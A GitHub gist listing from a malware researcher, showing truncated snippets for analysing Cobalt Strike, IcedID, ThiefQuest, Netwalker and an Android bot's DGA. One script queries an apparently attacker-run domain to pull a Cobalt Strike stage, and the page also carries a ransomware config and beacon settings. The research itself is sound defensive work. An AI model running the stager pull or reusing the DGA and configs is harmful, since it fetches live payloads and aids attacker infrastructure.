Skip to content

Instantly share code, notes, and snippets.

View sysopfb's full-sized avatar

sysopfb

192 followers · 8 following
View GitHub Profile
@sysopfb
sysopfb / go_116_pclntab.py
Created May 6, 2021 20:10
import sys
import struct
magic = '\xfa\xff\xff\xff\x00\x00'
ver = 'le'
psize = 8
def find_pclntab(data):
off = data.find(magic)
@sysopfb
sysopfb / dns_stager.py
Created April 22, 2021 16:03
CobaltStrike DNS pull script
import dns.resolver
c = '.stage.1950252.updates.updaternetworkmanagerr.com'
v = ord('a')
vv = ord('a')
vvv = ord('a')
done = False
out = ""
while not done:
t = dns.resolver.query(chr(v)+chr(vv)+chr(vvv)+c, 'TXT')
@sysopfb
sysopfb / dga.md
Created March 4, 2021 17:38
Android bot DGA

DGA code:

import java.util.Calendar;
import java.util.Random;
public class myTest {
    private static long seed;
    private static final int MAX_HOSTS = 2000;
private static void GetSeed(int m) {
        int i = Calendar.getInstance().get(1);
@sysopfb
sysopfb / lambo.md
Created November 13, 2020 14:23
Lambo - eCrime correlation effect

The Lambo - eCrime correlation effect

Compiled by Jason Reaves

Lamborghini sales

YEAR Sales Growth
1997 48
@sysopfb
sysopfb / decoder.py
Created July 20, 2020 15:41
new icedid photoloader decoder
import sys
import pefile
import struct
def decode(data):
out = ""
for i in range(len(data)/2):
t1 = data[i*2]
t2 = data[(i*2)+1]
t1 &= 0xf0
@sysopfb
sysopfb / rc4_ext.py
Created July 18, 2020 19:19
RC4 algorithm with SBOX extension
def decode_data(data, key, sz):
S = list(range(sz))
S = [x&0xff for x in S]
j = 0
out = []
for i in range(sz):
j = (j + S[i] + ord( key[i % len(key)] )) % sz
S[i] , S[j] = S[j] , S[i]
i = j = 0
for char in data:
@sysopfb
sysopfb / blah.py
Created July 10, 2020 14:06
Code addition for auto string decode
import yara
rules = yara.compile(source='rule urls { strings: $a1 = /[0-9a-zA-Z_|]{6,}00000\d+/ ascii wide condition: all of them }')
def decoder(data):
matches = rules.match(data=data)
if matches != []:
matches = matches[0].strings
@sysopfb
sysopfb / gist:96f70121bce87c873aa4b9cf692d59d2
Created July 7, 2020 19:01
Analysis notes between thiefquest and normal rc2
Checking the expanded keys shows no difference
t2 uses thiefquests generate_xkey
>>> t2
bytearray(b'\xcav33JX2tdnsedvwwraH6pryV0sd2mxC5uSlhUQCxGxGmxE3ThvKBO1wSh58X4K7CHs0c35btQk1Pr2jaxxfqmD0uISsMH1rowcrluv93hwdD1RgC6MT4q7y34VTL1l4B')
t uses a standard key expansion for RC2
>>> t
bytearray(b'\xcav33JX2tdnsedvwwraH6pryV0sd2mxC5uSlhUQCxGxGmxE3ThvKBO1wSh58X4K7CHs0c35btQk1Pr2jaxxfqmD0uISsMH1rowcrluv93hwdD1RgC6MT4q7y34VTL1l4B')
@sysopfb
sysopfb / gist:8236351ff0540a425da8a77462d5abd7
Created May 29, 2020 14:24
netwalker_00062e5dd2faf97c7b5920be8c9a98b619500d6c_config
{
"lfile": "{id}-Readme.txt",
"spsz": 15360,
"lend": "SGkhDQpZb3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQgYnkgTmV0d2Fsa2VyLg0KQWxsIGVuY3J5cHRlZCBmaWxlcyBmb3IgdGhpcyBjb21wdXRlciBoYXMgZXh0ZW5zaW9uOiAue2lkfQ0KDQotLQ0KSWYgZm9yIHNvbWUgcmVhc29uIHlvdSByZWFkIHRoaXMgdGV4dCBiZWZvcmUgdGhlIGVuY3J5cHRpb24gZW5kZWQsDQp0aGlzIGNhbiBiZSB1bmRlcnN0b29kIGJ5IHRoZSBmYWN0IHRoYXQgdGhlIGNvbXB1dGVyIHNsb3dzIGRvd24sDQphbmQgeW91ciBoZWFydCByYXRlIGhhcyBpbmNyZWFzZWQgZHVlIHRvIHRoZSBhYmlsaXR5IHRvIHR1cm4gaXQgb2ZmLA0KdGhlbiB3ZSByZWNvbW1lbmQgdGhhdCB5b3UgbW92ZSBhd2F5IGZyb20gdGhlIGNvbXB1dGVyIGFuZCBhY2NlcHQgdGhhdCB5b3UgaGF2ZSBiZWVuIGNvbXByb21pc2VkLg0KUmVib290aW5nL3NodXRkb3duIHdpbGwgY2F1c2UgeW91IHRvIGxvc2UgZmlsZXMgd2l0aG91dCB0aGUgcG9zc2liaWxpdHkgb2YgcmVjb3ZlcnkuDQoNCi0tDQpPdXIgIGVuY3J5cHRpb24gYWxnb3JpdGhtcyBhcmUgdmVyeSBzdHJvbmcgYW5kIHlvdXIgZmlsZXMgYXJlIHZlcnkgd2VsbCBwcm90ZWN0ZWQsDQp0aGUgb25seSB3YXkgdG8gZ2V0IHlvdXIgZmlsZXMgYmFjayBpcyB0byBjb29wZXJhdGUgd2l0aCB1cyBhbmQgZ2V0IHRoZSBkZWNyeXB0ZXIgcHJvZ3JhbS4NCg0KRG8gbm90IHRyeSB0byByZWNvdmVyIHlvdXIgZmlsZXMgd2l0aG
@sysopfb
sysopfb / beacons.txt
Last active May 12, 2020 20:34
beacon pivots
Pivot from config at https://twitter.com/VK_Intel/status/1260296104672886790
{
C2_CHUNK_POST: 0
C2_POSTREQ: [('_HEADER', 0, 'Content-Type: application/octet-stream'), ('BUILD', ('PARAMETER', 'id'))]
C2_RECOVER: 
C2_REQUEST: [('BUILD', ('BASE64', 'HEADER', 'Cookie'))]
C2_VERB_GET: GET
C2_VERB_POST: POST
CRYPTO_sCHEME: 1